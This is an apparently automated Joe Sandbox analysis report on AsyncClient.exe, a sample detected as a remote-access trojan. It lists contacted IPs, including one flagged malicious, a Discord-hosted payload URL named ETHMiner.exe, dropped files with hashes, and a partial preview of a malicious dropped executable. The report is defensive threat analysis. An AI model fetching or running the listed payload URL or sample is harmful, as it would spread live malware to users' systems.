                                                      https://cdn.discordapp.com/attachments/859410781241475093/907881277804400691/ETHMiner.exei/chklugq.exe, 00000005.00000002.1648992753.0000000003D93000.00000004.00000800.00020000.00000000.sdmp, hklugq.exe, 0000000B.00000002.3882310558.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                        		high

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        83.147.52.247
                                                        		unknownSpain
                                                        		203178CUBENODEESfalse
                                                        172.217.17.78
                                                        		google.comUnited States
                                                        		15169GOOGLEUSfalse
                                                        82.64.156.123
                                                        		unknownFrance
                                                        		12322PROXADFRtrue
                                                        193.122.130.0
                                                        		checkip.dyndns.comUnited States
                                                        		31898ORACLE-BMC-31898USfalse

                                                        Private

                                                        IP
                                                        127.0.0.1

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1574525
                                                        Start date and time:2024-12-13 11:57:50 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 9m 5s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:16
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:AsyncClient.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.evad.winEXE@15/14@2/5
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HCA Information:
                                                        • Successful, ratio: 95%
                                                        • Number of executed functions: 258
                                                        • Number of non-executed functions: 12
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                        • Excluded IPs from analysis (whitelisted): 2.22.50.144, 2.22.50.131, 23.218.208.109, 20.12.23.50, 13.107.246.63
                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ocsp.digicert.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: AsyncClient.exe

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        05:58:55API Interceptor1x Sleep call for process: AsyncClient.exe modified
                                                        05:59:02API Interceptor3x Sleep call for process: svchost.exe modified
                                                        05:59:02API Interceptor3x Sleep call for process: powershell.exe modified
                                                        05:59:41API Interceptor8297040x Sleep call for process: hklugq.exe modified
                                                        11:59:04Task SchedulerRun new task: CreateExplorerShellUnelevatedTask path: C:\Windows\explorer.exe s>/NoUACCheck

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        82.64.156.123xx.exeGet hashmaliciousAsyncRAT, QuasarBrowse
                                                          193.122.130.0TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • checkip.dyndns.org/
                                                          T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • checkip.dyndns.org/
                                                          Malzeme #U0130stek Formu_12102024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • checkip.dyndns.org/
                                                          fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • checkip.dyndns.org/
                                                          jXN37dkptv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • checkip.dyndns.org/
                                                          UBS20240190101.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • checkip.dyndns.org/
                                                          BL-100410364195.exeGet hashmaliciousMassLogger RATBrowse
                                                          • checkip.dyndns.org/
                                                          INQUIRY REQUEST AND PRICES_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                          • checkip.dyndns.org/
                                                          Fiyat Teklifi_2038900001-MOKAPTO-06122024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • checkip.dyndns.org/
                                                          lQyRqxe4dt.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • checkip.dyndns.org/

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          checkip.dyndns.comZiraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                          • 193.122.6.168
                                                          TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 193.122.130.0
                                                          Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                          • 193.122.6.168
                                                          hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 158.101.44.242
                                                          hesaphareketi-01.pdfsxlx..exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 158.101.44.242
                                                          41570002689_20220814_05352297_HesapOzeti.exeGet hashmaliciousMassLogger RATBrowse
                                                          • 132.226.8.169
                                                          malware.ps1Get hashmaliciousMassLogger RATBrowse
                                                          • 132.226.8.169
                                                          Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                                          • 132.226.8.169
                                                          QUOTES REQUEST FOR PRICES.exeGet hashmaliciousMassLogger RATBrowse
                                                          • 132.226.8.169
                                                          T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 193.122.130.0
                                                          bg.microsoft.map.fastly.netgagagggagagag.exeGet hashmaliciousAsyncRATBrowse
                                                          • 199.232.210.172
                                                          Loader.exeGet hashmaliciousQuasarBrowse
                                                          • 199.232.214.172
                                                          1434orz.exeGet hashmaliciousQuasarBrowse
                                                          • 199.232.214.172
                                                          file.exeGet hashmaliciousStealcBrowse
                                                          • 199.232.214.172
                                                          3.exeGet hashmaliciousCobaltStrike, ReflectiveLoaderBrowse
                                                          • 199.232.210.172
                                                          3.exeGet hashmaliciousCobaltStrikeBrowse
                                                          • 199.232.210.172
                                                          Bilbao.dll.dllGet hashmaliciousUnknownBrowse
                                                          • 199.232.210.172
                                                          3181425fa7464801a03868a1adf86bc1.ps1Get hashmaliciousUnknownBrowse
                                                          • 199.232.214.172
                                                          job.ps1Get hashmaliciousDcRat, StormKitty, VenomRATBrowse
                                                          • 199.232.210.172
                                                          job.ps1Get hashmaliciousDcRat, StormKitty, VenomRATBrowse
                                                          • 199.232.210.172

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          PROXADFRxx.exeGet hashmaliciousAsyncRAT, QuasarBrowse
                                                          • 82.64.156.123
                                                          powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 82.230.52.233
                                                          mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 91.166.57.42
                                                          b3astmode.mips.elfGet hashmaliciousMiraiBrowse
                                                          • 82.234.37.51
                                                          b3astmode.ppc.elfGet hashmaliciousMiraiBrowse
                                                          • 91.175.167.215
                                                          jade.arm.elfGet hashmaliciousMiraiBrowse
                                                          • 82.235.175.168
                                                          jade.m68k.elfGet hashmaliciousMiraiBrowse
                                                          • 88.123.212.84
                                                          jade.arm7.elfGet hashmaliciousMiraiBrowse
                                                          • 88.180.232.173
                                                          jade.ppc.elfGet hashmaliciousMiraiBrowse
                                                          • 88.165.18.238
                                                          loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                          • 82.255.25.225
                                                          CUBENODEESfile.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 193.46.218.44
                                                          file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 193.46.218.44
                                                          sh4.elfGet hashmaliciousMiraiBrowse
                                                          • 213.220.16.0
                                                          mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 213.220.10.117
                                                          w4DO1Z18yg.wsfGet hashmaliciousSmokeLoaderBrowse
                                                          • 193.46.217.78
                                                          UkHkCa3IYV.wsfGet hashmaliciousSmokeLoaderBrowse
                                                          • 193.46.217.78
                                                          3312.PDF.wsfGet hashmaliciousSmokeLoaderBrowse
                                                          • 193.46.217.78
                                                          RmbF3635xY.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 193.46.217.78
                                                          https://public-usa.mkt.dynamics.com/api/orgs/656e8c66-5e77-ef11-ac1e-6045bd080c27/r/lmUG5F4EgUesqGwuJA5PigEAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fcrm.interactivaclic.com%252Fn%252F%253Fc3Y9bzM2NV8xX29uZSZyYW5kPVNUVjBVakk9JnVpZD1VU0VSMjMwOTIwMjRVMjYwOTIzMjE%253DN0123N%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%221%22%3Anull%7D%7D&digest=HTFuI1dWNsWznL3K1x2s1mvQbKix%2BdykwHJYfkmm7o4%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15eeGet hashmaliciousUnknownBrowse
                                                          • 89.44.32.18
                                                          cFvDKWB1V8.ps1Get hashmaliciousXWormBrowse
                                                          • 83.147.55.182

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                                          Download File
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8192
                                                          Entropy (8bit):0.35999246155449205
                                                          Encrypted:false
                                                          SSDEEP:6:6xDoaaD0JOCEfMuaaD0JOCEfMKQmDMxDoaaD0JOCEfMuaaD0JOCEfMKQmD:haaD0JcaaD0JwQQnaaD0JcaaD0JwQQ
                                                          MD5:D6D3830984AEC72B32E4EF5030B32290
                                                          SHA1:A645195729EB557B4B773E137AA78ECB17CFB96D
                                                          SHA-256:09BA30C4D4F2F7FEC3C62A7AD0D5103CE6662FDAB91F62803144CCB6B20E4604
                                                          SHA-512:44C27B21C2BB77D57AC1499ABFEB4FA11B45A7EC856276696132498302733B88EE7D748E05ABD6DAC09C8A478CCC803F16A8E1FF7305245F82E382D2617AA69F
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:*.>...........~.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................~.............................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                          Download File
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1310720
                                                          Entropy (8bit):0.8063121199324689
                                                          Encrypted:false
                                                          SSDEEP:1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAy:RJE+Lfki1GjHwU/+vVhWqpf
                                                          MD5:91A97494EB95BB1623DA49612D935905
                                                          SHA1:818CFBAA1F358D410C976C513358628CB666C1B1
                                                          SHA-256:8B571D164E611267EDA544D0B1A8683FE961ACDB274883A55371F6504F2502A8
                                                          SHA-512:357F35496E529D37F62B6D1A32B0DF546B117F20B77975D3460EC8C6DB2854DBBBA62FBEB477CB2AE44B5D86A604FADD5DEA6E0E9E59A9039076AEEBF0DF9366
                                                          Malicious:false
                                                          Preview:..Q^........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.....................................3~L.#.........`h.................h.......1.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                          Download File
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x8132b397, page size 16384, Windows version 10.0
                                                          Category:dropped
                                                          Size (bytes):1048576
                                                          Entropy (8bit):0.7864911574281814
                                                          Encrypted:false
                                                          SSDEEP:1536:LSB2ESB2SSjlK/IECXK0I9XGJCTgzEYkr3g16t2UPkLk+k0+lKuy9nyS2kILzsL6:LazauEezm2U
                                                          MD5:48CD61F791BB9D258063485A7F83F164
                                                          SHA1:D6C1097FEA4FA128AAAFA2F4C52F1713606DD0C5
                                                          SHA-256:108E39360F7E8B8B9F2ED1AD6FD168C126D298783C7482D7941091D4D186D9DC
                                                          SHA-512:E5ECCBA7C73EB7B93355E09776026651DE65B87F7A1C1CF73ABA41B526BEC63E5EE1BF2EA59D03BDDDD28B9F978E48B568D99D3F5B1D1BEA102DA52D19C6061D
                                                          Malicious:false
                                                          Preview:.2..... ...............X\...;...{......................0.}..........|...;...|..h.z..........|..0.}.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{..........................................|...................K......|...........................#......0.}.....................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                          Download File
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16384
                                                          Entropy (8bit):0.07868467715661871
                                                          Encrypted:false
                                                          SSDEEP:3:LMl/OetYeRRV//l6tuopQdx1nuV//l5uEQ//lallmn/lZOPp3lll:ol/rzRRd/Cuopkcd/m/AiD
                                                          MD5:4418262AC72101FCE17383ED3275BE83
                                                          SHA1:3A45B5A784510E8FB58BAB12210CA78C7770D930
                                                          SHA-256:B11B7A2AD429BA565F57674B139F25B55C04B9E2EB0C6E17721E97589C2F116D
                                                          SHA-512:2462BE4B882772E3BF966EFDA9FFF3CB9E92DA5B81D192E2727EE72924E5F83665BAE41B304F7A3A766828602EC712BC2B24E990A01CACA040211AF26D9DFB82
                                                          Malicious:false
                                                          Preview:17D......................................;...{...;...|.......|...............|.......|...`.......|....................K......|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                          Download File
                                                          Process:C:\Users\user\Desktop\AsyncClient.exe
                                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                          Category:dropped
                                                          Size (bytes):71954
                                                          Entropy (8bit):7.996617769952133
                                                          Encrypted:true
                                                          SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                          MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                          SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                          SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                          SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                          Malicious:false
                                                          Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                          Download File
                                                          Process:C:\Users\user\Desktop\AsyncClient.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):3.12264937921322
                                                          Encrypted:false
                                                          SSDEEP:6:kKO+M/L9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:y/iDnLNkPlE99SNxAhUe/3
                                                          MD5:2AB34880B4C6C62DB391DDD3E5F85859
                                                          SHA1:25900D7AAB8E684CCF680FA00B76A519793B29DC
                                                          SHA-256:52EE2A1BC44F2C0C668D8934522EC49156F7CC20F687DC6B72762EE7E7AD0042
                                                          SHA-512:8E800661BE7A049632A6766A97372ABA60238AE8816CAB7928727E444C71C63158F5E89C5E106B9D94C243316E3C97C9F422EEA5A2DA6B1C0BA05DE6FFC39420
                                                          Malicious:false
                                                          Preview:p...... ...........NM..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hklugq.exe.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\hklugq.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):5.34331486778365
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):5.381012167721272
                                                          Encrypted:false
                                                          SSDEEP:24:3fWSKco4KmBs4RPT6BmFoUebIlmjKcmZ9tXt/NK3R8e9rq:PWSU4y4RQmFoUeUmfmZ9tlNWR82m
                                                          MD5:19F0BB3956264ABD06BAAB6064859654
                                                          SHA1:02D9D143DAD52B38CF85BAA5EDFA8E5282C8F536
                                                          SHA-256:F9EAA222F1E4CAC97B91C7C5A5AFCF9700CE841272FC8D43DDED2EF8C91B3E94
                                                          SHA-512:72985D8BC64B56A29A30C0D7457C1035828544FD5FD027E6305813B94DE23C89985B88723C650CC17F54314C1D182B066DC2206F784A386527E9E131C03CC47B
                                                          Malicious:false
                                                          Preview:@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_buwetalt.bzz.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ceazdsfa.qy2.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\hklugq.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\AsyncClient.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):717824
                                                          Entropy (8bit):4.382852947858265
                                                          Encrypted:false
                                                          SSDEEP:6144:57A/MmghsENIsRctX5rUvQSNj0LZOWM8yucn:5U/Mv0rU1Nj0LZOd8yus
                                                          MD5:5890798F97F9144206499433A5DB3011
                                                          SHA1:1C9C488123A81BF8D2216AC57C089E056F899433
                                                          SHA-256:69BE5428A0E939A5BF4453B34AAD1A86791AB75411B6A339D727197F82BC8411
                                                          SHA-512:964F340060A67ABED11D06AC40CB8CB2577F985E8815CC12F306E37A716792AE8EDAC02645D0CDDEEA5D81F72EF402363C909B6F510EB2A37C76F1CF56CAADA9
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[D..........."...0.............N.... ... ....@.. .......................`............`.....................................O.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H........-..........<....+..p...........................................6!..6S....&+.*~!..6S....&+..($..........(....*^!..6S....&+.~....(9...*.!..6S....&+..,..{....,..{....o%.....(....*...(......(.........(....(3...(...+*..(B...*^..(D...r=..p(K....2...*n(S....(T...~6...s....(U...*.rE..p.6...*.~7...-.rJ..p.....(....oV...sW....7...~7...*.~8...*...8...*.~9...*..(X...*VsC...(Y...t.....9...*....0..).......!..6S....&+.(....(....(....(....(....(....(....(....(....(....(....(....(...

                                                          C:\Users\user\AppData\Roaming\PID\2068

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\hklugq.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):4
                                                          Entropy (8bit):2.0
                                                          Encrypted:false
                                                          SSDEEP:3:pdn:z
                                                          MD5:814A9C18F5ABFF398787C9CFCBF3D80C
                                                          SHA1:27443871965BE0AE4BC321EC011D40182CEEF962
                                                          SHA-256:9BBF7A2C2940B4C95EA485F65A8731A1372AEE56EDCA6ED31E66E7EB0F47E28B
                                                          SHA-512:E6982B5A4202F05B4DB57C18128CB02425F45FA64F12E8034AFBE30F73E1E1E85D475633217BD8137A97497599C165F84284E7EF812F7CEEDEAC7C08EE8C030A
                                                          Malicious:false
                                                          Preview:2068

                                                          C:\Users\user\AppData\Roaming\RegisterDate

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\hklugq.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):10
                                                          Entropy (8bit):2.446439344671015
                                                          Encrypted:false
                                                          SSDEEP:3:OK8B:OKG
                                                          MD5:FD72A614E3D762DDA6BC76BFEFAE8C5D
                                                          SHA1:F8B30D9405F4EC2E336BF7B1EE880F29985F697F
                                                          SHA-256:B19FE2308FE353209EB8FE5B2804169514CA16E5F32B1088C8E3A46EB6383BC5
                                                          SHA-512:E3817649C05849AA87FFFF40B3DE56F5A6F1D49E8231B7B46D95F55908070629EB3FBD3A2B355CCF6A068B56F724FA7BE5DE5FDCBC7FCEF9BFF8A06367A42D92
                                                          Malicious:false
                                                          Preview:12/13/2024

                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                          Download File
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):55
                                                          Entropy (8bit):4.306461250274409
                                                          Encrypted:false
                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
